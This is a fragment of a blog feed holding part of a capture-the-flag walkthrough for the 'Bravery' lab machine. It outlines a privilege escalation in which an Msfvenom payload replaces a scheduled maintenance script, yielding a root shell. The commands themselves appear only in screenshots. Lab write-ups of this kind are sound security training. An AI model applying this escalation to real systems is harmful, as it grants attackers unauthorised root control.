root:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqfCxZWraG4iHBOyF_9CQGUcxkiHBUNg6g2GpWofGR2XG7ePyg1hvOHnadxQHTn_AF0rDo09UarttJCYnBm6crBP6uf4fhEpln5Ak-nN4CwbubGDnZaQYoMTvnorOkFiZFWxV-aFHeN9d6/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;185&quot; data-original-width=&quot;674&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiqfCxZWraG4iHBOyF_9CQGUcxkiHBUNg6g2GpWofGR2XG7ePyg1hvOHnadxQHTn_AF0rDo09UarttJCYnBm6crBP6uf4fhEpln5Ak-nN4CwbubGDnZaQYoMTvnorOkFiZFWxV-aFHeN9d6/s16000/screenshot.50.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgep3_E3DkEBUL6uyemCcYuiydZKz1of3CYXOHA28HEnJlue0rLcOWhRqYgPyncDwJBjDFGNNuClQPD0m1TKkLBYeb_fkSrRjo5AEqVoJfQuLHYMmL2k7oaZu2BRbFJW5rtFcoIMdCcbwLB/&quot; style=&quot;clear: left; display: inline !important; font-family: arial; font-size: large; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;137&quot; data-original-width=&quot;505&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgep3_E3DkEBUL6uyemCcYuiydZKz1of3CYXOHA28HEnJlue0rLcOWhRqYgPyncDwJBjDFGNNuClQPD0m1TKkLBYeb_fkSrRjo5AEqVoJfQuLHYMmL2k7oaZu2BRbFJW5rtFcoIMdCcbwLB/s16000/screenshot.49.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running &lt;b&gt;maintenance.sh&lt;/b&gt; is denied:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj65u4vM2PXPHDKCLJJ85-vrQMlCCoyQEw5qhIq6fW0bGno71de4fpSAU-BH5hjVH-oVsU4FKwAHWDWvs-v_VzhnvbLUeML98obEK17MJdrlPkBMSCO8uHjjpy_RXZm0xcA777Ab0yVE0E/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;452&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj65u4vM2PXPHDKCLJJ85-vrQMlCCoyQEw5qhIq6fW0bGno71de4fpSAU-BH5hjVH-oVsU4FKwAHWDWvs-v_VzhnvbLUeML98obEK17MJdrlPkBMSCO8uHjjpy_RXZm0xcA777Ab0yVE0E/s16000/screenshot.51.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Now, let&#39;s create a exploit with Msfvenom:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeu3qtlPyX9VUz5upOH9os709xeivIpWbH2zLd1F3jmMFVQ-QEGIl-oFveDSTOVFbXia3rH-Av1DzvExzJ8Qh7d1y4cHFXAhxzWTQ7FFXgE7QmsNWahaNyg5mcGeUBhndp2LMTfuiXXuOH/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;138&quot; data-original-width=&quot;1133&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjeu3qtlPyX9VUz5upOH9os709xeivIpWbH2zLd1F3jmMFVQ-QEGIl-oFveDSTOVFbXia3rH-Av1DzvExzJ8Qh7d1y4cHFXAhxzWTQ7FFXgE7QmsNWahaNyg5mcGeUBhndp2LMTfuiXXuOH/s16000/screenshot.52.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Setting a listener session:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpecWPyvGd_0quqEH6FMA1416_4yAgaaQv4exn6lwW8TKqZN2XJGxqPqG9EGTxNeciuRC-K6xRar5zkS8XNeCALEg5STpQas-iGZH-8NTC5T10PC9HOfuyRJ5T37wY_swDOW7bZmmvx_kI/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;50&quot; data-original-width=&quot;384&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgpecWPyvGd_0quqEH6FMA1416_4yAgaaQv4exn6lwW8TKqZN2XJGxqPqG9EGTxNeciuRC-K6xRar5zkS8XNeCALEg5STpQas-iGZH-8NTC5T10PC9HOfuyRJ5T37wY_swDOW7bZmmvx_kI/s16000/screenshot.53.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Creating the script &lt;b&gt;new_maintenance.sh&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxThIIpqPciR7236oqTgrMOOnW_-U3F93Lfuj71wdT68Tg8NIC2FLxF_Nw3N_q1UqorP743ehe-JokXPlWd_Qv0LG8Y-TYn-jxptzFSSYLk90mI4YGbn5dSf2PhmS03FYC3KrGX9UvT-rN/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;69&quot; data-original-width=&quot;1149&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxThIIpqPciR7236oqTgrMOOnW_-U3F93Lfuj71wdT68Tg8NIC2FLxF_Nw3N_q1UqorP743ehe-JokXPlWd_Qv0LG8Y-TYn-jxptzFSSYLk90mI4YGbn5dSf2PhmS03FYC3KrGX9UvT-rN/s16000/screenshot.55.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Transferring&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;new_maintenance.sh&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt; from &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;Kali&lt;/b&gt;&lt;span style=&quot;font-family: arial; font-size: large;&quot;&gt; to &lt;/span&gt;&lt;b style=&quot;font-family: arial; font-size: large;&quot;&gt;Bravery:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDTHszmOWm5HJvgjmx2eUabcnHe2KMB3x_xCB3rypxtdDGhIDb5bOrFsU7VibhMyo204zPJK42dLX5D7NSb2t5clgbWKi4rpX6WlZ89YKealxLNmXUBTz6I_1OQ2gmcR1RMvtMHUArC9Vg/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;263&quot; data-original-width=&quot;858&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhDTHszmOWm5HJvgjmx2eUabcnHe2KMB3x_xCB3rypxtdDGhIDb5bOrFsU7VibhMyo204zPJK42dLX5D7NSb2t5clgbWKi4rpX6WlZ89YKealxLNmXUBTz6I_1OQ2gmcR1RMvtMHUArC9Vg/s16000/screenshot.56.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Copying with &lt;b&gt;cp&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_pPwXuhh2tJBTu0tMfwtwAEEx2h-7S8p-r43HDTSd327aIeeEIiDExGmCLh0HPnzidmle8FQJO8_SDbQCmnUdV9LZVTJZtkD03zvR7s8sJrrXN52lupkmHwIqAISonj5D5VO2OoXYwoqm/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;49&quot; data-original-width=&quot;598&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_pPwXuhh2tJBTu0tMfwtwAEEx2h-7S8p-r43HDTSd327aIeeEIiDExGmCLh0HPnzidmle8FQJO8_SDbQCmnUdV9LZVTJZtkD03zvR7s8sJrrXN52lupkmHwIqAISonj5D5VO2OoXYwoqm/s16000/screenshot.57.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9qDo_76zduCzOlLWCldsFNQu7XwHkbs9suBgf5kw6hIzmL8jPgXGtJDDSQca_pcbomEHIqcTf6wFQSoiWbX79grS1BbYZj5XUg14Kyv6HZ9QX48L_jXvX9j3i6gWxH-dUQdrWCbs-T5O/&quot; style=&quot;clear: left; display: inline !important; font-family: arial; font-size: large; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;95&quot; data-original-width=&quot;1143&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiO9qDo_76zduCzOlLWCldsFNQu7XwHkbs9suBgf5kw6hIzmL8jPgXGtJDDSQca_pcbomEHIqcTf6wFQSoiWbX79grS1BbYZj5XUg14Kyv6HZ9QX48L_jXvX9j3i6gWxH-dUQdrWCbs-T5O/s16000/screenshot.58.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Waiting until &lt;b&gt;maintenance.sh&lt;/b&gt; is run, a root shell is achieved:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizIojhLX7zy77eJ3MtPBV3UNloJuh5C0-2356OmoamkM9adcXiRwfGlB103SuWs1xWN3iBH9tywzmszgv5lmBohQzZa9_8QgfiWh-mEJcP4WfkUlFQEBUcM-ahApfrJlrW-tiZNEFo5GEq/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;131&quot; data-original-width=&quot;679&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizIojhLX7zy77eJ3MtPBV3UNloJuh5C0-2356OmoamkM9adcXiRwfGlB103SuWs1xWN3iBH9tywzmszgv5lmBohQzZa9_8QgfiWh-mEJcP4WfkUlFQEBUcM-ahApfrJlrW-tiZNEFo5GEq/s16000/screenshot.59.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;5 - CAPTURING THE FLAG&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYo2TXioBy8oJBxO_BwgFqvP4fqiLmlEPOlDkx-uIUI2k3oSRbRcGyp-u1rHK54BPts3GS3Llly8N4aXH-64znwW-A0SH8tXNr07SXBv47X3Y-BETruKh74jRMDCSQXqin5NKgrc-BraQp/&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;391&quot; data-original-width=&quot;418&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYo2TXioBy8oJBxO_BwgFqvP4fqiLmlEPOlDkx-uIUI2k3oSRbRcGyp-u1rHK54BPts3GS3Llly8N4aXH-64znwW-A0SH8tXNr07SXBv47X3Y-BETruKh74jRMDCSQXqin5NKgrc-BraQp/s16000/screenshot.60.jpg&quot; /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3163363275319018771'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/3163363275319018771'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/bravery.html' title='Bravery'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjggG9BoGv6-CPyUnSi0rNrLdVMYQu4i1j69rGTmkrYO5v4OCKnnM0nz6pH3CIq86OPcuNYic-th1rjDivukC9gsVTbONHdJgB6tLVtaJOvLzs9YW2bqKQUKhrM-H4AjfVVnQ8pwDVi6lUw/s72-c/screenshot.63.jpg" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-4987567849134413275</id><published>2022-01-25T11:42:00.004-06:00</published><updated>2022-01-25T11:43:26.244-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>EVM</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;EVM&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXYoEndKjb9d94HxNogZ4L-bC5hRA4RqwnMEoH55IGzKxLCAzmZ9dzVNziXJeRpOkNqAr8i6flilV78sOpahp8W2um0_SS2_DUTxiSmMoDKmFyqoIZqO1a9Z0ehNDJJqbBbrMy2gXWWgNu/&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: 